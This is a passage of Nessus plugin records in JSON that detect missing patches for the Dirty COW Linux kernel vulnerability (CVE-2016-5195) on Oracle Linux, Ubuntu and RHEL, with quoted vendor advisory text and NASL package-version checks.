script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2016:2105 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006443.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-2105\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-abi-whitelists-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-abi-whitelists-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-devel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-devel-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-doc-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-firmware-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-headers-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perf-2.6.32-642.6.2.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-perf-2.6.32-642.6.2.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:46", "description": "It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerability (USN-3105-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3105-1.NASL", "href": "https://www.tenable.com/plugins/nessus/94153", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3105-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94153);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3105-1\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerability (USN-3105-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3105-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3105-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-100-generic\", pkgver:\"3.13.0-100.147\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-100-generic-lpae\", pkgver:\"3.13.0-100.147\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-100-lowlatency\", pkgver:\"3.13.0-100.147\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:21:48", "description": "USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 38, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-xenial vulnerability (USN-3106-2) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3106-2.NASL", "href": "https://www.tenable.com/plugins/nessus/94156", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3106-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94156);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/09/18 12:31:46\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"USN\", value:\"3106-2\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial vulnerability (USN-3106-2) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3106-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu\n14.04 LTS.\n\nIt was discovered that a race condition existed in the memory manager\nof the Linux kernel when handling copy-on-write breakage of private\nread-only memory mappings. A local attacker could use this to gain\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3106-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.4-generic,\nlinux-image-4.4-generic-lpae and / or linux-image-4.4-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2019 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-5195\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3106-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-generic\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-generic-lpae\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-45-lowlatency\", pkgver:\"4.4.0-45.66~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T05:33:34", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "edition": 43, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-24T00:00:00", "title": "RHEL 7 : kernel (RHSA-2016:2098) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2016-2098.NASL", "href": "https://www.tenable.com/plugins/nessus/94230", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2098. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94230);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"RHSA\", value:\"2016:2098\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2016:2098) (Dirty COW)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A race condition was found in the way the Linux kernel's memory\nsubsystem handled the copy-on-write (COW) breakage of private\nread-only memory mappings. An unprivileged, local user could use this\nflaw to gain write access to otherwise read-only memory mappings and\nthus increase their privileges on the system. (CVE-2016-5195,\nImportant)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2098\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5195\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", 